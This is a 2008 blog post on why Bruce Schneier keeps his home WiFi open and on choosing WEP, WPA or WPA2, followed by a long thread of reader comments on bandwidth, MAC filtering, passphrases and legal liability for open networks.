June 29, 2008
Bruce Schneier is something of a legend in the computer security community. He's the author of the classic, oft-cited 1994 book Applied Cryptography, as well as several well-known cryptography algorithms.
The cheeky Norris-esque design above is a reference to the actor names commonly used in examples of shared secret key exchange.
What I find most interesting about Bruce, however, is that he has moved beyond treating computer security as a problem that can be solved with increasingly clever cryptography algorithms:
Schneier now denounces his early success as a naive, mathematical, and ivory tower view of what is inherently a people problem. In Applied Cryptography, he implies that correctly implemented algorithms and technology promise safety and secrecy, and that following security protocol ensures security, regardless of the behavior of others. Schneier now argues that the incontrovertible mathematical guarantees miss the point. As he describes in Secrets and Lies, a business which uses RSA encryption to protect its data without considering how the cryptographic keys are handled by employees on "complex, unstable, buggy" computers has failed to properly protect the information. An actual security solution that includes technology must also take into account the vagaries of hardware, software, networks, people, economics, and business.
This is the programming equivalent of realizing that Peopleware is ultimately a much more important book than The Art of Computer Programming. The shift in focus from algorithms to people is even more evident if you frequent Bruce's excellent blog, or read his newest books Practical Cryptography and Beyond Fear.
As much as I respect Bruce, I was surprised to read that he intentionally keeps his wireless network open.
Whenever I talk or write about my own security setup, the one thing that surprises people – and attracts the most criticism – is the fact that I run an open wireless network at home. There's no password. There's no encryption. Anyone with wireless capability who can see my network can use it to access the internet.
I've advocated WiFi encryption from the day I owned my first wireless router. As I encountered fewer and fewer open WiFi access points over the years, I viewed it as tangible progress. Reading Bruce's opinion is enough to make me question those long held beliefs.
It's a strange position for a respected computer security expert to advocate. But I think I get it. Security is a tough problem. If you take the option of mindlessly flipping a WPA or WEP switch off the table, you're now forced to think more critically about the security of not only your network, but also the fundamental security of the data on your computers. By advocating the radical idea that your wireless network should be intentionally kept open, Bruce is attempting to penetrate the veil of false algorithmic security.
I may understand and even applaud this effort, but I don't agree. Not because I'm worried about the security of my data, or any of the half-dozen other completely rational security arguments you could make against intentionally keeping an open wireless network. My concerns are more prosaic. I desperately want to protect the thin sliver of upstream bandwidth my provider allows me. Some major internet providers are also talking about monthly download caps, too. Bruce's position only makes sense if you have effectively unlimited bandwidth in both directions. Basically, I'm worried about the tragedy of the bandwidth commons. As much as I might like my neighbors, they can pay for their own private sliver of bandwidth, or knock on my door and ask to share if they really need it.
So, to me at least, enabling wireless security is my way of ensuring that I get every last byte of the bandwidth I paid for that month.
It's worth realizing, however, that wireless security is no panacea, even in this limited role. Given a sufficiently motivated attacker, every wireless network is crackable.
With that in mind, here are a few guidelines.
- WEP = Worthless Encryption Protocol
WEP, the original encryption protocol for wireless networks, is so fundamentally flawed and so deeply compromised it should arguably be removed from the firmware of every wireless router in the world. It's possible to crack WEP in under a minute on any vaguely modern laptop. If you choose WEP, you have effectively chosen to run an open wireless network. There's no difference.
- WPA requires a very strong password
The common "personal" (PSK) variant of WPA is quite vulnerable to brute force dictionary attacks. It only takes a trivial amount of wireless sniffing to obtain enough data to attack your WPA password offline – which means an unlimited amount of computing power could potentially be marshalled against your password. While brute force attacks are still for dummies, most people are, statistically speaking, dummies. They rarely pick good passwords. If ever there was a time to take my advice on using long passphrases, this is it. Experts recommend you shoot for a 33 character passphrase.
- Pick a unique SSID (name) for your wireless network
Default wireless network names just scream I have all default settings! and attract hackers like flies to honey. Also, pre-generated rainbow tables exist for common SSIDs.
- Use WPA2 if available
As of 2006, WPA2 is required on any router that bears the WiFi certification. WPA2, as the name might suggest, is designed to replace WPA. It has stronger and more robust security. There's no reason to use anything less, unless your hardware doesn't support it. And if that's the case, get new hardware.
In the end, perhaps wireless security is more of a deterrent than anything else, another element of defense in depth. It's important to consider the underlying message Bruce was sending: if you've enabled WEP, or WPA with anything less than a truly random passphrase of 33 characters, you don't have security.
You have the illusion of security.
And that is far more dangerous than no security at all.
Posted by Jeff Atwood
I would think that if your ISP ever accused you of violations in the terms of service, you would certainly like to know if it were you and not some nosy teenager within range running a bunch of Pirate Bay seeds.
My router should configured with some level of security to disprove negligence on my part. With a layer of security in place, however superficial, I can say that someone had to hack into my network. This, I argue, stands to relieve me of responsibility of that person's actions. I don't want the RIAA or MPAA coming after me. :)
If you choose WEP, you have effectively chosen to run an open wireless network. There's no difference.
I disagree, computer security as such doesn't exist, it is an illusion, and if you don't know that, that is the first problem and biggest problem you have
ALL you can do is raise the bar as high as you can, and as weak as WEP can be, it does prevent most people from connecting, and for most people that's the only purpose
For me, protecting my wireless connection is necessary simply because of the RIAA and MPAA. The thought of being sued for thousands of dollars just because I was too lazy to password protect my WiFi router, makes me quite sad and mad at the same time.
I have already received a warning from my ISP because someone was using my unprotected WiFi connection to download WinXP. After that email, I locked down my router and that, they say, was that.
not subverting the security of your encryption itself
He didn't say the *encryption* is crackable. He said the *network* is, which is true, as you admit yourself. Anybody even remotely involved with security will tell you that these days, encryption is rarely being broken by attacking the algorithm itself -- it's waste of time, implementations are often so poor you're better off attacking weaknesses in the implementation (or, of course, simply confusing people into giving you the access you needed).
I'd say the blame should go to who ever designed such an unusable security system for Wifi.
In a context like corporation network, manned with an army of system administrators, current way of managing wifi network security makes perfect sense. Some security guru makes a decision to use this or that encryption, mandates that its passwords shall be 300 characters long Klingon haikus, and sends his henchadmins to configure all company devices accordingly.
Meanwhile I have exactly one laptop, one wireless router and no spare system administrators to set them up. Since I have physical access to both my laptop and my router, why can't I just push a button on both to make them seek each other and negotiate an encryption and its password. Something similar already works fine on Bluetooth, just otherwise poorly designed, but the basic idea is good.
Obviously that sort of system wouldn't replace the flexibility of just writing a network password for unaccessible routers. but it would eliminate configuration difficulties on private routers.
With an open network, the RIAA or MPAA are the least of your worries. All it takes is one freeloader hitting a child pornography site with your IP address to ruin your life. By the time you prove it wasn't you (assuming you even can), the damage has been done. That, more than anything else, is reason to lock down your network.
As for for the DS - they sell a USB Wifi adapter for it; you can plug that into your PC and bridge the connection, allowing you to use WPA for the rest of your network.
For that matter, add a MAC filter and turn off SSID broadcasting; they're trivial measures to beat, but every little roadblock pushes the freeloaders toward your (easier to exploit) neighbors.
Mac whitelisting is a false sense of security. It is easily possible to change the mac-address of a device (in software). And the mac is in the unencrypted part of a wifi-packet. Therefore you only need to capture one packet to get a valid, whitelistet mac.
Any cryptographic, social or physical lock is always best attacked and defeated at the weakest point.
Failure of security is (almost) always due to the squishy bits found between keyboards and monitors. Attack there.
Example: You generated a 8192 bit private/public key pair, and then applied a password to that private key for its protection. Fine, breaking the generated key would presently require eternity or quantum computing (barring algorithmic flaws). But, the fact that the private key password is your pet dog's name, just because it's easy to remember and to type for you ... well, as soon as someone gets your 'password protected' private key file by whatever means, the squishy bit which decided to use your pet dog's name has ensured that the locks protected by it will be compromised in short order.
To try to combat this, the logic which is (and should be) applied is one of an onion skin. It's not a single layer which will protect you, but multiple layers, each (unfortunately) with their own squishy bits. Any one of these layers may be 'broken' in sequence, but it is the depth of these layers which will keep you (as best as can be hoped for) secure. A critical fact which many miss, is that each of these layers also needs to be independent and distinct from each other in order to be effective. Chaining the 'locks' is all too common, and often once the first key is in the lock, all other tumblers fall easily.
Using the example of Wireless Security:
For a personal home user, they could readily set up difficult to break security with relatively inexpensive equipment - i.e. just a suitable Wireless Router and a (PC based) firewall.
Configure Wireless Router to WPA-PSK appropriately.
Apply MAC filtering to only permit specific devices to connect to the Router.
Disable DHCP and use fixed IP addresses (just because we can).
Connect it to the firewall and create a Blue(Wireless) Network interface.
Only permit the MAC address of the Wireless Router for Blue Access.
Configure the firewall to only permit a VPN tunnel from Blue(Wireless) to Green(Internal).
Generate the corresponding key pair for the VPN access requirements.
Protect the internal machines (Windows/Linux) with suitable network access requirements (Domain/Workgroup/Usernames/Passwords/etc.)
From the onset, it would appear that we have to break, in order, WPA-PSK, then the Routers MAC filtering, then determine the network address range, then the firewall MAC filtering, then the firewall VPN tunnelling, then the target machine security ... sounds hard, and it would be.
However, examine the actual 'lock' usage case of the (assumed) 'squishy bit' user's laptop ... which was left sitting on the desk ...
Open the door, smash a window, use social engineering, whatever means for access ...
(Domain/Machine) Logon Password = pet dog's name.
The laptop will then log in, auto-connect to the wireless network (saved configuration), run up the VPN connection, and use the (already supplied or saved) password to connect to the network shares and/or domain, regardless of the WPA-PSK and VPN passwords chosen, or the length of VPN Keys used.
Impossible to crack locks have all tumbled in order. One very weak password, and we're done.
The locks broken in this case were the physical access lock and the social lock (squishy could choose the domain/machine password), which are often not considered.
Then again, maybe it was already left on the desk, logged on ... wouldn't that have been the ultimate in easy?
If you believe every potential entry point is hostile, then the onion skin method makes it as dificult as possible. Unfortunately, it's the best you can do, when dealing with squishy bits.
Never leave the locks unattended when unlocked.
Never chain your locks, for any reason.
And never, ever use weak locks (passwords).
As E.Z. just pointed out, you only have to be more secure than your neighbors are. It's like the old joke about not having to be able to outrun the mountain lion. You only need to be able to outrun your buddy.
The only reason I use WEP is to stop someone from stumbling on to my wifi and stealing my bandwidth. WEP and simple passcode is enough to keep 99.9% out, for that 0.1%, using WPA or other would makes little difference.
Sounds like a job for KeePass.
Try entering a 33 character password on an AppleTV using that crappy remote with the on-screen keyboard :(
European old built house helps better : walls are so thick the signal hardly leaks outside :) ^_^ Back to basics back to physics.
And for the record, I have been working in a famous bank. Its very secure unusable authentification system was down for one day : the QA team forgot to renew the security certificate in time, they discovered it in the morning when 15000 could not log in.
Security relies on the fact there is a chain of competent people doing their job correctly ; the longer the chain, the weaker the chain, especially when security guru claim another complicated tool that elongates the chain is needed to enforce it.
Am I the only one here thinking that major one threat in security are security gurus ?
I don't know where you get the Experts recommend you shoot for a 33 character passphrase bit from. The page you cite talks about
[...] passphrases longer than 20 characters are needed to start deterring attacks.
Anyway, a really good way to create good passphrases that you still can remember is Diceware http://world.std.com/~reinhold/diceware.html
treating computer security as a problem that can be solved with increasingly clever cryptography algorithms
I'm not ok with him in this point, cryptography is one way and I think we could find others better solutions
I agree completely ... squishies are the problem. No matter how many layers, no matter how good the technology ... one bad squishy and everything collapses.
Social, physical or cryptographic locks ... leave any one unlocked or weak, and that's where to go attack ...
A competent 'guru' is one who considers everything, and tries to spot the problems without introducing unnecessary complexity to hide the true issue. (i.e. protecting a 4096 Bit key with a dictionary word, unencrypted laptops, auto-login, auto-connect, auto ... anything)
Anywho ... leaving a WiFi network open is equivalent to inviting others to steal from you (bandwidth), to implicate you (copyrighted content), to become you (identity theft), to damage you (malicious destruction), to finance them (botnet, zombie, spam), to ... well, you get the picture. :-)
WEP is fine for me. I don't think many of the chavs in this area have the intelligence necessary to gain access to my network..
Since I live in a less populated area (my neighbors' houses are about 100 feet away in either direction), I don't have many problems with people showing up on my network (I got in the habit of checking the logs fairly regularly and banning mac addresses of my neighbors just so they didn't accidentally log in to my network when I lived in a townhouse). People parked in the street will generally be approached by someone asking if they're lost or making sure they're not up to something.
It comes down to the same idea as not having virus scans running in the background on your computer. If you pay attention to the environment you generally won't have these types of problems.
Of course, if you're in a hostile environment, there's no reason not to take measures to secure yourself, or at least make yourself a less likely target than someone else. If I don't know my neighbors, there are a lot of them, or no one bothers approaching the guy in the strange car parked out front, it's probably a good idea to at least put a couple of roadblocks on the access point, and make sure you have a good lock on the door while you're at it.
The problem with WEP is that it's the only connection option available on my Nintendo DS. DS vs secure network... dude, that's a tough choice.
More important that protecting your bandwidth is protecting your reputation, I see some people here have been warned about people downloading copyrighted material via there connection - what about illegal material. Illegal types of porn or worst still terrorist activities. You wouldn't want the authorities knocking on your door and then the battle to prove that it wasn't you that downloaded that stuff - much worse than just some copyright suing contest.
Quick note: I just realised how that could be read, I'm not saying that there are things worse than illegal types of porn, I'm just thinking about british law, etc. allowing you to be locked up for 'x' days without charge on the mere-ist hint of envolvement with terrorist activities.
I agree with thing2k - I use wireless encryption solely to keep 99% of potential crackers away from my bandwidth. It is kind of like having 'orange' as a captcha - easy to break, but effective none the less.
What's the saying? Locks are there to keep honest people honest.
If all you're worried about is protecting your bandwidth, then WEP is fine. Hell, for that matter, just not broadcasting your SSID should be sufficient.
Depending on where you live, say an area that's not particularly known for being technically literate (let's just say some random city in Kansas for the sake of argument), I would not be at all surprised if in the entire life of your router there is never a single person who has the desire and know-how to defeat either of those precautions.
Even if you are in a technically literate area (say, silicon valley), you still probably don't have anything to worry about. Sure, someone may well access your network... but it's just one person. They're probably not going to affect your bandwidth all that much. If they do, you'll notice it and ban their MAC.
Some people here are worried about getting into trouble with thier ISP's for copyright crap, or worse the FED's for illegal crap stating that it would be a battle to clear your name. Are you serious people? I assumed most reading this blog were of above average intelligence, I mean here you are discussing cryptography, yet you think it would be hard to clear your name? Hmmm they have an IP or a MAC that they tied to the download....so? If you've nothing to hide handing over your hd is trivial. If they can't prove that YOU downloaded the offensive/illegal material (e.g. by finding it on your hd) then you can't be charged for much more than being stupid enough to let your terrorist/child molester neighbors hop onto your network. As they say possession is 9/10ths of the law. Sure you'll be watched for the next couple months, but after watching you do the stupid innocent crap we all do on the net for a couple months they won't be bothering any time soon.
If your network is open, you can claim in a court that someone else have been using your network to pirate files (especially if no such files were found on your pc).
If your network is closed and secure, you will have to prove that someone hacked in (even though it's EASY to do).
Therefore a secure network is in fact making you less secure by a) not adding much additional security, but b) making you more responsible.
That is one of the reasons Schneier listed in his blog.
Please enter new password:
Sorry, password not long enough!
i thought encryption increased latency since the router has to decrypt traffic. a coworker suggested using mac address whitelisting. im using wep still because its the most convenient for all devices. i kind of have this principle in life where i wait for something to happen before i change what im doing. if someone hacks my network, then i'll change the settings. it seems to be deterring random people from connecting just fine.
... if you've enabled WEP, or WPA with anything less than a truly random passphrase of 33 characters, you don't have security.
Does that mean you go against your previously stated belief that pass phrases are better than passwords, at least for your wireless access? (July 17, 2005 post) Just curious as to why in this case you would go with a 33 random character password rather than a longer, more complex pass phrase.
This is the programming equivalent of realizing that Peopleware is ultimately a much more important book than The Art of Computer Programming.
Ouch! Are you certain you'd still feel that way if you read the latter?
Bruce is the expert and I'm nobody. I have no qualifications to support my opinion that he really enjoys being contrarian and thus annoying (which is not to say he isn't right). This is based on my observation that he seemed to be criticizing everything everyone else is doing, and making only the most vague positive suggestions. I stopped reading his blog some time ago, so that may not be valid anymore.
So, what do I know? There are several open wireless signals near my home that anyone looking for a signal can use, and I'm a nonentity so my data isn't likely to be targeted, so I feel that my simplistic, childish efforts to lock down my wireless is adequate. I'm not into getting into pi__ing contests with experts.
I desperately want to protect the thin sliver of upstream bandwidth my provider allows me.
Yep. WHen I first got a wireless router I decided to keep it open in case neighbors wanted to share. A few weeks later, I was trying to play a game and getting a terrible connection... I checked the router and noticed a neighbor using nearly all of my bandwidth downloading stuff.
Now only specified MAC addresses can connect.
@M: If your network is open, you can claim in a court that someone else have been using your network to pirate files (especially if no such files were found on your pc).
That is soooo not true. The email I got from my ISP clearly stated that I am responsible for protecting my connection to the internet. If someone gains access to my internet connection due to an unprotected wireless router, I am fully responsible for the data that is transferred.
paul mentioned use of an open WiFi connection that I hadn't even thought about. And just because you live in an area where your neighbors are not very bright, doesn't mean that someone wardriving can't find your open WiFi connection and go to town while sitting in his car. He has to be caught by the police in order to be arrested for such activity. If you have an open WiFi connection, it's unlikely you are going to know that someone is sitting outside your house using your connection that you were unaware of.
These days, it's just downright stupid to leave a wireless router open for anyone to connect to.
Regarding the DS and WEP, I have an Airport I plug in when I want to do an update or play online. That, or I find a free access point like a coffee shop and go from there.
That said, I find it annoying that I need WEP to get my game on :(
I finally have a reason to post a comment.
I use WEP, and I know it is crackable. I don't care and I will tell you why.
My goal is to protect MY bandwidth from roaming neighbors (etc.). Unless you have a crazy hacker as a neighbor, none of the average people will be able to crack your network and bleed it with WEP enabled.
So, if your stated goal is the same as mine (and it seems to be) you have no need for WPA with a 33 character randomly generated password.
Bruce Schneier has it right. However he should at least put WEP on his network to prevent the average person from bleeding his bandwith.
Timothy F. Brown
Security is always an attempt to leverage against time, money, resources and motivation. WEP is the networks no trespassing sign. It does nothing but tell those with little motivation to stay away.
I think Bruce misses the bigger picture too often. With an open wireless and secure computers, he is keeping his valuables in a big safe, but removing the locks from his front door.
Yeah, most people look at this issue from only one side. They think that WEP/WPA exists merely to keep people out. As in, I don't want them to steal my bandwidth, so I use WPA. Or I don't have anything to hide so I keep the wi-fi open.
The other thing your key does is prove that the access point you are connecting to is really yours.
If your wi-fi is open, your access point is spoofable. There are all kinds of content-injection and mistaken-identity attacks that can be carried out when you consume the internet through a compromised AP, from hijacking Google results to giving you a rootkit-enabled Firefox download.
So if you use open wi-fi, here's a question you should really ponder: how do you know the router you are connecting to is your own?
I live just on the border of a rural area, yet at least one of my neighbors is running a wireless network as well... it used to be on the same channel as mine.
I use WEP for precisely the reason others have mentioned: Not necessarily to protect me, but to prevent casual users from using my network... and because my DS doesn't support anything better (damn you, Nintendo).
Also, there's my neighbors wide open network in the same range...
I use WPA. mac access list and no SSID broadcast. I feel safe.
If my ISP slaps a monthly download cap on me, there is a good chance that a killing spree will ensue.
While I wouldn't recommend WEP, I will say that it isn't totally worthless.
There are a LOT of people who leech off of wireless networks, but have never bothered/learned/tried to crack WEP. In a dorm or apartment complex, even having the poor protective of WEP will often cause leechers to ignore your network and leech from someone else, who is totally unprotected.
Totally agree with the illusion of security. We've been trying to tell that to our group for a while.
Example: at our work, we have to use these electronic keys for the building. We have tons of paperwork to get them, tons of paperwork if we lose them, audits, etc.
Guess what I found out my first day? I got lost on a floor and walked up to the wrong office front. Stuck in my key, beep beep, got in. The receptionist pointed me to the right office, but had she not been there, or been a temp, I could have walked in and one what I wished.
The MAJOR advantage to WEP over completely open is that it stops people from connecting without even realizing they're doing it.
Some people have their laptops configured so that it automatically connects to any open WiFi port. Astonishingly, some of these people DON'T EVEN UNDERSTAND WHERE WIFI COMES FROM. It just works in some places, and doesn't in others. Magic.
If I had lots of bandwidth to spare I'd just let them have it. Why not? But, sadly, I've got a very limited amount of bandwidth that the cable company condescends to let me buy.
I keep my WiFi set to WEP because sometimes I like to connect with my Nintendo DS, which for some reason, doesn't do anything better.
I wish there was an easy way to keep my router open, but only let others use a certain percentage of my bandwidth. I mean If I was desperate, I'd rather have 10kb/s of free wifi then nothing at all.
Alternately, live in a house far enough away from everything that people would have to sit in your front garden to even get a low signal from your router!
Good article ;)
How timely. I was just re-reading Why Software Sucks by David Platt (http://www.whysoftwaresucks.com/), and the section on security makes specific mention of Bruce Schneier's regrets about his epic book. Platt makes the same point that, like most computing problems, security is a people problem more than a technical one.
Also, coincidentally, I just moved into an apartment complex and one of my neighbors is running an unsecured wireless network with Comcast service. Since I am on lowly dial-up until I build up a sizable savings, I have been enjoying their 11 Mpbs with or without their knowledge.
I think this man is very lucky no one in his area jumps onto his Wifi and downloads a movie that's still in the theaters off an unencrypted torrent.
The MPAA would not buy I leave my network open for all to use.
If I were to leave a loaded handgun in my mail box, and some kids found it and shot someone, would the judicial system let me go since I have an open policy with my handguns?
It's sad that this is what it boils down to, but it does. The systems in place to regulate things are terribly far behind when it comes to lawsuits involving what is in my opinion horrifically unfair precedent, that is obviously perpetuated by the money and power of a group of people watching their profits slip away. The judges have to take weeks to have this stuff explained to them. The technology has had a few too many leaps and bounds.
Anyone familiar with the immense fun that can be had wardriving knows WEP/WPA is crackable, but given the severe nature of assumed guilt in these cases, I would get a traditional wired router, and run everything I could off that. Drop the uplink of that to one of the wired ports of a wireless acsess point that was carefully set up to only allow certain mac addresses through. You'd still have to watch for spoofing and other methods to break that, but you have to do something.
There are many cases of people being sued by both the RIAA and the MPAA when they are clearly not technologically savvy enough to do so. I believe often these people are the victim of internet hijacking.
My personal method is to literally disable the wireless on the router when its not in use. My house is already wired for CAT5 so I do have an advantage in this respect, but yea wired wireless. Speed, security, its just better. This day in age, its beneficial to certain file downloaders to hijack someone elses internet so they bear all the responsibility when the ISP starts sending out warning letters.
Never mind bandwidth throttling, try being brought to trial. D:
Jeff writes, A few years ago it was easy to find an open one almost anywhere, usually with the default name of Linksys or Netgear. Now it's far less common. No wireless router that I know of comes with WEP or WPA on, so I assumed the general public was getting slowly educated about security.
There are something like 20 routers visible to me, most in the form 2WIRE###. ATT had a new deal out for cable over DSL, and apparently the neighbors loved it. If you think the average consumer has little incentive to care about wireless encryption, ATT certainly isn't caring too hard for them.
Some people have their laptops configured so that it automatically connects to any open WiFi port. Astonishingly, some of these people DON'T EVEN UNDERSTAND WHERE WIFI COMES FROM. It just works in some places, and doesn't in others. Magic.
A great point -- and a valid use of WEP!
I've been surprised how many wireless access points are protected these days. A few years ago it was easy to find an open one almost anywhere, usually with the default name of Linksys or Netgear. Now it's far less common. No wireless router that I know of comes with WEP or WPA on, so I assumed the general public was getting slowly educated about security.
Bruce lives in a very nice neighborhood! THAT is his best security strategy. :-)
Another thing that you might want to experiment with is to name your network with something like, hackers or virus. The fact that it's wide open for anybody to enter makes it even more scary.
Don't lock the doors to your house: it's trivial for anyone to get in anyway. Keep your blinds open: a determined peeping Tom could look in anyway.
I agree with what people above have said: use the security features of your network, just don't think they're perfect.
I use WEP because I want to keep the casual idiot neighbor from (a) stealing bandwidth, (b) downloading illegal or otherwise embarrassing stuff using my internet connection, and (c) providing a modest amount of privacy. I use WEP because I sometimes use an older laptop that doesn't support WPA well.
I doubt I'm going to attract a serious cyber-attacker going after my WiFi. More likely the casual snoop or bandwidth leech. For those, even WEP is pretty good. I'd guess it's illegal to break into a secured wireless network (if push came to shove and you needed to take action against an abuser); might be less clear if you ran an open wifi network.
There is NO reason why you shouldnt use the maximum length WPA password as generated by a random generator (google WPA password generator). A 63 char WPA password is the best you can get with current technology I think.
I am using passphrases for few years already, however (especially for enterprise applications) it is often not accepted - password is too weak.
It was beautiful day outside and Tom was happy is less secure than itf4! :(
I guess I don't feel so safe. Ahh well, the only thing I run on wifi is one tv laptop and the Wii.
Why can't we encrypt more of the wifi packet? including the mac and ssid...
Monthly limits is exactly why I want to secure my network.
12 gb limit and above that I pay 1.5 euros for every gb.
So yes, I don't want my neighbours to use my network.
Didn't use WAP though (gave problems with vnc...) but I have my router configured to only give ip addresses to the pcs I have via their MAC address. Seems to work fine.
Of course, my neighbours can still sniff my data and there are workarounds for the MAC address but hey, they're dummies too ;)
I used WEP and I'm really not that concerned that my desperate housewife neighbors are going to crack my wireless network. I would have to say that even crappy WEP is fine 99.9% of the time.
I just have a mac address whitelist. It keeps the common folk out.
What I'd like is a router that gives the best of both worlds.
- it would have multiple zones and allow multiple forms of encryption
- public, old, and private as follows:
Public would be time-limited and/or restricted bandwidth. It also would discourage persistent mooches by tracking MAC addresses. Public zone can't see any other devices on the network. it can only see the router, and the router could also blacklist or whitelist IP's and domains if you wish.
Old would be for WEP devices that can't use newest protocols, and 'old' can only see private zone computers if enabled on a device-by-device bases. The thinking here is DS-lite and other things that likely don't need full network access nor a strong key (since WEP is broken anyways), but we don't want to compromise the security of the entire network for the sake of a few devices that are rarely used.
Private would be the highest level of encryption. Everything in this zone can see each other by default. This is the internal network.
To round this out, the router would have a display showing usage/activity/etc on the front of the unit, and there would be hard buttons to turn any of the zones on or off. The display would be decent, and not just a couple of LED's with gray on gray text in an 8 point font.
My own 99 quid 3com router is a braindead piece of sheet, needs the occasional reboot, and was a complete hassle to get it working with WPA on my mac. As far as I can tell, router technology hasn't advanced too much.
My point is we can create a device that gives you reasonable security and choice in a presentable way that even mom's and dad's can understand.
@Dave: I'm not sure your reasoning is sound in all jurisdictions. Isn't I didn't do it, my wifi was open a perfect way to defend yourself if you're accused? Claiming that you didn't do it when your wifi was protected is much harder to pull off.
Strong passwords and white-listing of MAC addresses are the best you can do for your network. With a MAC white-listing, there is no way someone can access your network. And even if they did, through some magical technology, they'd have to have another petaflop or two to crack the strong password. And even if they could do that within 30 days, I change the password and then they'd have to re-petaflop their cracking algorithm.
Even better, keep an open network as a decoy and another one with strong decryption. Let them access your junk network pointing to copies of MSDOS3.3 and such.
If everything else fails, you can always grab the attacker by the WinSocks :))))))
Just because no one has mentioned it so far:
Steve Gibson has an excellent online strong password generator that is ideal for generating a good WPA password.
In the UK, BT routers come with WEP enabled by default and I suspect many providers do the same. Pretty irresponsible really, and arguably worse than shipping with no security enabled at all.
My recent attempt to switch to WPA went OK for Windows but I failed to get my linux laptop to connect (Ubuntu). I must try again sometime.
I personally would not mind letting other people use my WLAN. Regarding bandwidth, that's easy: I'd run a Linux router and make it used priority scheduling. Packages of known hosts will get high priority, everything else will get low one. That means other people can use only my idle bandwidth. Whenever I need bandwidth, I will get it, slowing down their throughput, but hey, it's my network, my bandwidth, I paid for it, so I can use it whenever I want to. However, most of the time I have a lot of idle bandwidth, why shouldn't other people be allowed to use it? Also I have unlimited traffic, so I don't have to pay more if other people use it.
The real reason behind securing my WLAN is the German law. Unlike an ISP, who is not responsible for what their users are doing online, courts have decided that if you ran an open WLAN in Germany and other people *abuse* it (spamming, copyright violation, and so on) you *ARE* responsible for it. It was done via your account and you could have prevented it (by using an encrypted WLAN), you did not, hence you are responsible for it.
All this talk about whitelisting MAC addresses makes me want to ask: since a MAC address can be configured on pretty much any wireless NIC is this 'security' technique truly effective? Or is it something that just adds a minor level of annoyance to someone who wants to hack into a network (similar to protecting with WEP)?
If all cars have no locks, then your car with a lock is much less likely to be stolen
If all cars have locks, then your car with an alarm is much less likely to be stolen
If all cars have alarms, then your car with an immobiliser is much less likely to be stolen
If your WiFi is unprotected then it will get hijacked
If your WiFi is has WEP then it is less likely to get Hijacked
If your WiFi is has WEP with a decent password then it is even less likely to get Hijacked
The point to take home is that just because you use WEP/WPA/whatever, you're not secure. Don't be fooled, with enough resources all wireless is hackable because people can monitor the encrypted traffic.
You are however a little more secure. There's still a heck of a lot of unencrypted traffic, and someone can sit outside, record your actions, make a note that you're about to go on vacation for 1 week, leaving flight xyz at 1300, etc.
Someone mentioned their terms of service saying they are responsible. That is different than legally responsible for illegal content. That said, unless you have money to burn, you're better off not going up against the MPAA legal team justifying their salaries. Regarding the terms of service, you may have still have your account terminated or face a bandwidth bill, and that's your fault because that's what you agreed to. You do read the fine print right?
Encryption as a means to ensure you're not spoofed is a good idea.
When traveling it is nice to hit free wifi and grab my mail, but again I worry about who I've connected to. Is it just a honeypot and they're watching what I'm doing?
At a place I used to work at, all they had was rubbish WEP, because it's the lowest common denominator. Literally thousand upon thousands of laptops meant that they couldn't even conceivably change the password without major effort. The solution was that they regarded the WEP as compromised and had a really good VPN which they did control rather tightly, and all traffic was routed via the VPN. Nothings perfect, but it works. (vss over vpn over encrypted wireless - ouch!)
The only problem I see is that it's a high barrier to entry to do things correctly. I have a job and a life, and I just don't have the time to set everything up 'just so' to make sure I'm safe. Small companies don't have a chance either. They can only usually afford some small time hobbyist and hope they know what they're doing.
- securing files on my drive
- securing backups
- unsecured backups (because I don't always trust encryption)
- securing network access
- securing the network
- securing the house
- securing programs accessing the network
This is the point of security. It's too hard, so you do a few things and hope for the best.
the incontrovertible mathematical guarantees miss the point
no they are actually just wrong. there is no water tight mathematical guarantee that any encryption is secure. it is breakable by default, or else you can't decrypt it...
this has always been the case and always will be, its trivially provable.
now as to the amount of time it takes to crack... that can be analysed and used as an /indicator/ as to how quickly a given encryption can be cracked.
ultimately anyone who says security method x is unbreakable for the next y years is wrong by default. and forgot a whole load of common sense before using their fancy theories... or they understood this and missed the importance of careful wording.
I leave my home network open. The chances of my neighbors being highly skilled hackers is next to zero, and even if one moves in or visits without my knowing it, there isn't much exciting or incredibly sensitive on my machine in any case. The worst that can happen is they maliciously screw up my computer, but I have regular daily backups, and believe enough in human nature that if I label my network FreeWifi, only a total prat will feel the need to cause damage.
So the main threat is my neighbor using too much bandwidth with torrents, etc. That hasn't happened in the 6 or so years I've left my connection open, and if it one day does, then I'll just lock it, or set a limit the bandwidth for outsiders (the fon network works like this). No big deal.
I also travel a lot, and it's an incredible pain in the ass to have to pay (and register through some incredibly slow, clumsy process with an incomprehensible UI) for a new wifi hotspot at every damn place I stop. I am overwhelmed by gratitude anytime I find an open network so I can quickly check on some things on the web before moving on. What goes around, comes around, and some generosity on everyone's part would make everyone have to pay less and be less frustrated with web access when not at home.
I'm not at all an expert in security and cryptography, but what about WPA2? Is it much more secure by itself than WPA?
My WiFi network at home is WPA2-encrypted. I'm using Windows Vista and Ubuntu computers. I've noticed that Windows XP computers can't connect to it, because WinXP does not support WPA2.
Advanced people miss the point on this. I know enabling one of these protocols isn't stopping another advanced hacker. It's stopping *my* neighbors from accidentally or even intentionally using my wireless network. Most of my neighbors have computer literacy rates slightly above your average 60 year old. Do you lock your front door to keep out lock-pickers and safe-crackers?
My No Wires setup at work and at home...
1. Wireless Open access, sid broadcast enabled, no encryption.
2. IPSec VPN client required to actually enter the network.
This is why I use WPA-2 and I also use MAC filtering. I have an unusually long passphrase that includes numbers and symbols within words, I also do not broadcast my SSID. I like to think that my set up is secure. I have tried to hack my own network using a laptop that was not on the MAC address list. I was not able to connect. In fact, most wireless software did not even see my network in the first place. I live in a city and there are always at least 5 other networks availabe. I believe the difficulty one would have in gaining access to my network would be enough to keep them from trying. I think they would be more likely to suck the bandwidth from one of the other people who have no security or WEP on thiers.
@mikeb: MAC is likely a major annoyance because you have to guess it to crack it. It is effectively the first line of defense. If that line of defense fails, then you have the strong password which is not very crackable.
Check out the book called Wi-Foo which is a very interesting read on Wardriving and network security. And a very in-depth read too.
The shift in focus from coding issues to management issues simply shows that you are grasping the bigger picture. I suspect that you would have been middle management in a few years.
Just a comment. :)
Security is a hard one - speaking frankly, a truly secure organization will intimidate most employees who are used to many privileges which are easily exploitable. Adding on to that, bioengineering techniques are both appallingly easy to utilize. Security is largely a bit of an illusion... but still a necessary illusion.
